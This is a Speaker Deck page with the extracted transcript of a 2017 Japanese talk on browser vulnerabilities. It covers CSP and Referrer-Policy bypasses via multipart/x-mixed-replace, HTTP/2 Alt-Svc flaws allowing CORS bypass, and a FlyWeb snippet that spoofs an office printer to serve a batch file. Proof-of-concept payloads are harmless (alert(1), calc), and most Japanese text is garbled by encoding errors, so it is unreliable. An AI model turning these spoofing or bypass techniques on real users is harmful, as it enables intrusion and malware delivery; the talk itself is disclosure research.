Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
脆弱性発見者が注目する近年のWeb技術
Search
MUNEAKI NISHIMURA
February 03, 2017
Technology
29
13k
脆弱性発見者が注目する近年のWeb技術
RECRUIT Technologies NIGHT vol.3の発表資料です。
MUNEAKI NISHIMURA
February 03, 2017
Tweet
Share
More Decks by MUNEAKI NISHIMURA
See All by MUNEAKI NISHIMURA
脆弱星に導かれて
nishimunea
3
2.6k
Brave Browserの脆弱性を見つけた話(iOS編)
nishimunea
3
2.7k
ブラウザの脆弱性とそのインパクト
nishimunea
26
9.9k
脆弱性発見者の目から見た、脆弱性対応の最前線
nishimunea
15
2.7k
Slack Team for Security Testers and Bug Hunters
nishimunea
1
800
Finding Vulnerabilities in Firefox for iOS
nishimunea
3
8.7k
SWIFT Code for Mozilla Bank
nishimunea
1
950
次世代プラットフォームのセキュリティモデル考察
nishimunea
6
5.4k
Other Decks in Technology
See All in Technology
AIのAIによるAIのための出力評価と改善
chocoyama
2
580
本が全く読めなかった過去の自分へ
genshun9
0
630
2025-06-26_Lightning_Talk_for_Lightning_Talks
_hashimo2
2
100
A2Aのクライアントを自作する
rynsuke
1
220
AIの最新技術&テーマをつまんで紹介&フリートークするシリーズ #1 量子機械学習の入門
tkhresk
0
140
変化する開発、進化する体系時代に適応するソフトウェアエンジニアの知識と考え方(JaSST'25 Kansai)
mizunori
1
240
Snowflake Summit 2025全体振り返り / Snowflake Summit 2025 Overall Review
mtpooh
2
420
Should Our Project Join the CNCF? (Japanese Recap)
whywaita
PRO
0
180
Kotlin Coroutine Mechanisms: A Surprisingly Deep Rabbithole
amanda_hinchman
2
100
Claude Code Actionを使ったコード品質改善の取り組み
potix2
PRO
6
2.4k
怖くない!はじめてのClaude Code
shinya337
0
130
How Community Opened Global Doors
hiroramos4
PRO
1
120
Featured
See All Featured
Performance Is Good for Brains [We Love Speed 2024]
tammyeverts
10
930
Distributed Sagas: A Protocol for Coordinating Microservices
caitiem20
331
22k
Docker and Python
trallard
44
3.4k
Practical Orchestrator
shlominoach
188
11k
[RailsConf 2023 Opening Keynote] The Magic of Rails
eileencodes
29
9.5k
Typedesign – Prime Four
hannesfritz
42
2.7k
Navigating Team Friction
lara
187
15k
Imperfection Machines: The Place of Print at Facebook
scottboms
267
13k
Writing Fast Ruby
sferik
628
62k
Refactoring Trust on Your Teams (GOTO; Chicago 2020)
rmw
34
3.1k
A Tale of Four Properties
chriscoyier
160
23k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
507
140k
Transcript
੬ऑੑൃݟऀ͕͢Δۙͷ8FCٕज़ 3&$36*55FDIOPMPHJFT/*()5WPM ݄
ଜ फߊ גࣜձࣾϦΫϧʔτςΫϊϩδʔζ αΠόʔηΩϡϦςΟΤϯδχΞϦϯά෦ γχΞηΩϡϦςΟΤϯδχΞ ࠃܞଳిϝʔΧʔͰͷηΩϡϦςΟίϯαϧλϯτ ͳͲΛܦ݄ͯΑΓݱ৬ɻϦΫϧʔτͷ*%ཧج ൫ͷηΩϡϦςΟอकϦΫϧʔτάϧʔϓશࣾͷ੬ऑ ੑमਖ਼ࢧԉʹܞΘΔɻझຯϒϥβͷ੬ऑੑΛ୳͢͜ ͱɻʹใࠂͨ͠੬ऑੑ݅Λ͑Δɻஶॻʹ
ϒϥβϋοΫʢ༁ʣɻओͳߨԋྺʹ$0%& #-6& ɺ"750,:0 ɺ1BD4FD ɻΑΓ ηΩϡϦςΟɾΩϟϯϓશࠃେձߨࢣ
੬ऑੑΛൃݟ͢ΔਓͷࢹͰ ͍ͯ͠Δ8FCٕज़Λհ͠·͢
Server Push
• ʹΓٞͱվળ͕ଓ͚ΒΕ͍ͯΔ8FCٕज़ • աڈʹ4FSWFS4FOU&WFOUT8FC4PDLFU • *&5'Ͱ)551QVTIΛޮՌతʹѻ͏ٕज़ͱͯ͠ &BSMZ)JOUT͕ఏҊ͞Ε͍ͯΔ • ଞʹɺϒϥβͰ1VTI௨Λड͚औΔٕज़ͷඪ४Խ͕ਐΜͰ͓Γɺ 8FC1VTIϓϩτίϧ1VTI"1*ͷ༷ࡦఆ͕ߦͳΘΕ͍ͯΔ
• ͦΜͳதɺݸਓతʹ͍ͯ͠Δͷʜ 4FSWFS1VTI
multipart / x-mixed-replace
http://web.archive.org/web/19961020045320/http://www3.netscape.com/assist/net_sites/pushpull.html
• ɺ/FUTDBQFʹࡌ͞Εͨ࠷ݹͷ4FSWFS1VTI • .+1&(PWFS)551ͷ৴खஈͱͯ͠༻͞Ε͍ͯΔ • .P[JMMBͷ5FMFNFUSZʹΑΔͱɺݱࡏͷར༻ • ݱࡏͰɺ'JSFGPY͘Β͍͔͠·ͱʹαϙʔτ͍ͯ͠ͳ͍ • ҰମͲ͜ͰΘΕ͍ͯΔͷ͔
NVMUJQBSUYNJYFESFQMBDF
#VH[JMMBͷݕࡧը໘ https://bugzilla.mozilla.org/buglist.cgi?quicksearch=nishimunea
3*$0)5)&5" https://developers.theta360.com/ja/docs/v2.1/api_reference/commands/camera.get_live_preview.html
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html <h1>Page 1</h1> --BOUNDARY
Content-type: text/html <h1>Page 2</h1> --BOUNDARY- ϖʔδͷσʔλ ϖʔδͷσʔλ
Կނ͍ͯ͠Δ͔ͱ͍͏ͱ
ηΩϡϦςΟϔομΛΑ͘ແࢹ͢Δ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ͰΠϯϥΠϯεΫϦϓτͷ࣮ߦΛېࢭ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Content-Security-Policy: default-src 'self' --BOUNDARY Content-type: text/html
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-
https://www.mozilla.org/en-US/security/advisories/mfsa2016-45/
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- $41ϔομͷҐஔΛԼʹͣΒͯ͠ΈΔ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY --BOUNDARY Content-type: text/html Content-Security-Policy: default-src 'self'
<script>alert(1)</script> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY-
·ͩͬͯͳ͍ https://bugzilla.mozilla.org/show_bug.cgi?id=1296471
https://bugzilla.mozilla.org/show_bug.cgi?id=1296471 ੬ऑੑΛӅ͢͜ͱΑΓɺ$41ͷ࣮͕ෆશͰ͋Δ͜ͱΛ 8FCαΠτͷ։ൃऀ͕Δ͜ͱͷํ͕େͩͱஅ͠ɺ .P[JMMBະमਖ਼ͷ੬ऑੑใΛ։ࣔ
HTTP/1.0 200 Content-type: multipart/x-mixed-replace;boundary=BOUNDARY Referrer-Policy: no-referrer --BOUNDARY Content-type: text/html <a
href="https://evil.example.jp">Link</a> --BOUNDARY Content-type: text/html <h1>Page 2</h1> --BOUNDARY- 3FGFSSFS1PMJDZϔομͰϦϑΝϥૹग़Λېࢭ ͳͷʹϦϑΝϥ͕ૹΒΕΔ
https://www.mozilla.org/en-US/security/advisories/mfsa2017-01/#CVE-2017-5385 'JSFGPYͰઌिमਖ਼͞Εͨ
৽͍͠ϔομ͕ొ͢Δͨͼָ͠ΊΔ
HTTP/2
• ݟ҉߸Λѱ༻ͯ͠ɺِͷ)5514αʔόʹଓͤ͞Δ͜ͱͷ Ͱ͖Δ੬ऑੑʢ$7&ʣΛ-5Ͱհͨ͠ +YDL͞Μͱͷग़ձ͍ɺIUUQษڧձͰͨ͠ https://http2study.connpass.com/event/13251/
ͦͷ੬ऑੑͷ࠶ݱө૾ΛݟͯΈ·͠ΐ͏
੬ऑੑͷݪҼ5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session
Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification
੬ऑੑͷݪҼ5-4ηογϣϯͷ࠶ར༻Ͱͨ͠ twitter.com (Fake) evil.csrf.jp https://twitter.com Reuse TLS Session Ticket (Session
Resumption) Fake Application Data http://evil.csrf.jp alt-svc: h2="twitter.com:8021" TLS Session Ticket http://evil.csrf.jp Establish TLS Session without server certificate verification ݟ҉߸Ͱαʔόূ໌ॻΛݕূͤͣʹ ཱ֬ͨ͠5-4ηογϣϯΛʜ )5514௨৴࣌ʹ࠶ར༻͍ͯͨ͠
• )551$POOFDUJPO3FVTF 3'$ - ಉ͡*1ΞυϨεɺ͔ͭಉ͡ূ໌ॻͷ$/4"/ʹؚ·ΕΔϗετͱͷ௨৴Ͱ͋Εɺ )551ίωΫγϣϯΛڞ༗ͯ͠Α͍ • )551"MUFSOBUJWF4FSWJDFT 3'$ -
ಉ͡ϦιʔεΛఏڙ͢Δସαʔόͷ༻ΛΫϥΠΞϯτʹఏҊ͢Δ - ྫʣBMUFYBNQMFKQͷ൪ϙʔτͰ)551ʹΑΔ௨৴ΛΦϑΝʔ )551ͷίωΫγϣϯཧͳ͔ͳ͔େม alt-svc: h2="alt.example.jp:8000";
flickr.com ෳυϝΠϯͷ)551ίωΫγϣϯΛڞ༗͢Δͱ͖ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &
flickr.com) Establish TLS Session ZBIPPDPNͱͷ௨৴Ͱཱ֬͞ΕͨίωΫγϣϯΛ GMJDLSDPNͱͷ௨৴ʹར༻Ͱ͖Δ Connection
flickr.com αʔόূ໌ॻͷϐϯχϯάݕূ͕Α͘࿙ΕΔ flickr.com yahoo.com yahoo.com Certificate (valid for yahoo.com &
flickr.com) Establish TLS Session Connection ͜͜ͰɺGMJDLSDPNͷެ։伴ϐϯχϯάΛݕূ͠Εͯ͠·͏ $7&ʢ'JSFGPYʣ$7&ʢ$ISPNFʣ
flickr.com ͦΕͬͯ੬ऑੑʁ flickr.com yahoo.com Certificate (valid for yahoo.com & flickr.com)
Connection yahoo.com Establish TLS Session ྆ํͷαΠτͷݖརऀҰॹͳͷͰ GMJDLSDPNͷϐϯχϯάΛݕূ͠ͳͯ͘ ࣮࣭తͳڴҖ͋·Γͳ͍ͷͰʁ
ಉ͡ূ໌ॻ͔ͩΒαΠτͷݖརऀ͕ಉ͡ͱݶΒͳ͍ • ྫ͑ɺ'BTUMZͷڞ༗ূ໌ॻαʔϏε - IUUQTKBGPVSTRVBSFDPN ͷূ໌ॻΛݟͯΈΑ͏
͜ΕΒͷαΠτͷϐϯχϯάΛᷖճͰ͖Δͱ͍͏͜ͱ
)551"MUFSOBUJWF4FSWJDF "MU4WD a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc:
h2="b.example.jp:443" Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate
"MU4WDͷਖ਼͍࣮͜͠͏ͳΜͰ͕͢ʜ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"
Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate BFYBNQMFDPNͷূ໌ॻΛ4/*Ͱཁٻ BFYBNQMFDPNͷূ໌ॻͰ͋Δ͜ͱΛݕূ
࣮ΛޡΔͱ%/4ϦόΠϯσΟϯά੬ऑੑʹͳΔ a.example.com HTTP/2 Application Data (authority: a.example.com) a.example.com alt-svc: h2="b.example.jp:443"
Certificate a.example.com Establish TLS Session b.example.jp Verify Certificate CFYBNQMFKQͷূ໌ॻΛ4/*Ͱཁٻ CFYBNQMFKQͷূ໌ॻͰ͋Δ͜ͱΛݕূ BFYBNQMFDPNͷ)551σʔλΛ ଞਓͷαʔόʹૹΓ͚Δ͜ͱ͕Ͱ͖Δ
͜ͷ࣮ϛε͕ݪҼͰ$034ΛᷖճͰ͖ͨྫ evil XMLHttpRequest with DELETE method alt-svc: h2="victim:443" victim Preflight
(OPTIONS method) DELETE request 1SFGMJHIUΛ߈ܸऀͷαΠτͰड͚ͯʜ ࣮ϦΫΤετ͚ͩΛඪతʹૹΔ
https://bugzilla.mozilla.org/show_bug.cgi?id=1148357 ࢲڻ͍͍ͯΔɻ͜Ε"MU4WDΛ༻͍ͨॳͷ੬ऑੑͩ
ಉ͡Α͏ͳ੬ऑੑ͕͖ͬͱࠓޙग़͖ͯͦ͏
FlyWeb
https://flyweb.github.io/#showcase
• .P[JMMB͕࣮ࢪ͍ͯ͠Δɺ8FCͱཧσόΠεͷ࿈ܞϓϩδΣΫτ - 8FCίϯςϯπͱɺͦΕΛӾཡͨ͠ਓͷۙ͘ʹ͋Δ༷ʑͳσόΠε͕࿈ಈ • ϓϩδΣΫτ·࣮ͩݧஈ֊ - 'JSFGPY/JHIUMZʹͷΈσϑΥϧτແޮͰࡌ - BCPVUDPOGJH
Ͱ EPNGMZXFCFOBCMFEUSVFʹઃఆ͢Δ͜ͱͰར༻Մೳ 'MZ8FC
• ෳͷεϚϗΛଓ͠ɺϒϥβ্ͰରઓܕϨʔεήʔϜΛ࣮ݱ 'MZ8FCͷར༻ྫʢ'MZ8FC(1ʣ https://www.youtube.com/watch?v=FJ5DEGvqDb4
'MZ8FCͷΈ Local Network (1) Launch a website (2) HTML /
JS (3) Publish mDNS and web servers (4) DNS Service Discovery (5) HTTP & WebSocket +BWB4DSJQUͰαʔόΛ্ཱͪ͛Δ ϩʔΧϧΤϦΞͷ͕ͦͷαʔόʹΞΫηε
navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers
= {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; });
navigator.publishServer('MyServer').then(server => { server.onfetch = e => { var headers
= {'Content-Type': 'text/html'}; var body = '<h1>Hello FlyWeb</h1>'; e.respondWith(new Response(body, {headers: headers})); }; }); .Z4FSWFS@GMZXFC@UDQMPDBMͱ͍͏αʔϏε໊Ͱ N%/4ͱ)551αʔόΛىಈ ϩʔΧϧΤϦΞͷ͕αʔόʹΞΫηε͖ͯͨ͠Β )FMMP'MZ8FCͱॻ͔Εͨ)5.-Λฦ͢
αʔόͷىಈ֬ೝμΠΞϩά͕ग़ͯ ϖʔδΛݟͨϢʔβ͕ʮ"MMPX4FSWFSʯΛબ͢Δͱ ϩʔΧϧΤϦΞͰN%/4ͱ)551αʔό͕ىಈ͢Δ
ϩʔΧϧΤϦΞʹ͋Δผͷ͕αʔόʹͭͳ͕Δ • 'JSFGPY͕ϩʔΧϧΤϦΞʹ͋Δ'MZ8FCαʔόΛࣗಈతʹ୳ࡧ͠ɺ ΞΫηεͰ͖ΔΑ͏ʹͯ͘͠ΕΔ
#POKPVSରԠΦϑΟεϓϦϯλͷཧը໘։͚Δ • 'JSFGPYͷ'MZ8FCΟϯυ@IUUQUDQʹରԠ͍ͯ͠ΔͷͰ #POKPVSͰ)551ͷ6*Λఏڙ͢ΔػثʹΞΫηεͰ͖Δ
'MZ8FCͰձࣾͷωοτϫʔΫʹ৵ೖͰ͖ͦ͏ͩ Local Network (1) Launch a website (2) HTML /
JS (3) Publish mDNS and web servers (4) Launch HTTP UI (5) Download malware 'MZ8FCͰΦϑΟεϓϦϯλͷ ཧը໘ʹͳΓ͢·͢ ཧը໘ʹΞΫηεͨ͠ʹ ϚϧΣΞ ͏͔ͬΓࣾһ͕᠘αΠτΛӾཡ
navigator.publishServer('Can0n ME220').then(server => { server.onfetch = e => { var
h = {'Content-Type': 'application/bat', 'Content-Disposition': 'attachment; filename=setup.bat'}; var cmd = 'calc'; e.respondWith(new Response(cmd, {headers: h})); }; }); ΦϑΟεϓϦϯλͱಉ͡%/4໊Λࢦఆ ΞΫηεͨ͠ʹ TFUVQCBU Λ
͕͢͞ʹυϝΠϯ͕ո͍͠ͷͰܯռ͞Εͦ͏͚ͩͲʜ
(PPHMF༁ܦ༝Ͱ։͚ͦΕͬΆ͍υϝΠϯʹ
ଞͷࣾһِ͕ͷΦϑΟεϓϦϯλʹΞΫηε͢Δͱʜ ϓϦϯλυϥΠό͔ͳ͊ʜʁ
None
͜ͷ··ͷ༷ͩͱຊʹѱ༻͞Εͦ͏
• 4FSWFS1VTI NVMUJQBSUYNJYFESFQMBDF • )551 • 'MZ8FC ͍ͯ͠Δ8FCٕज़Λͭհ͠·ͨ͠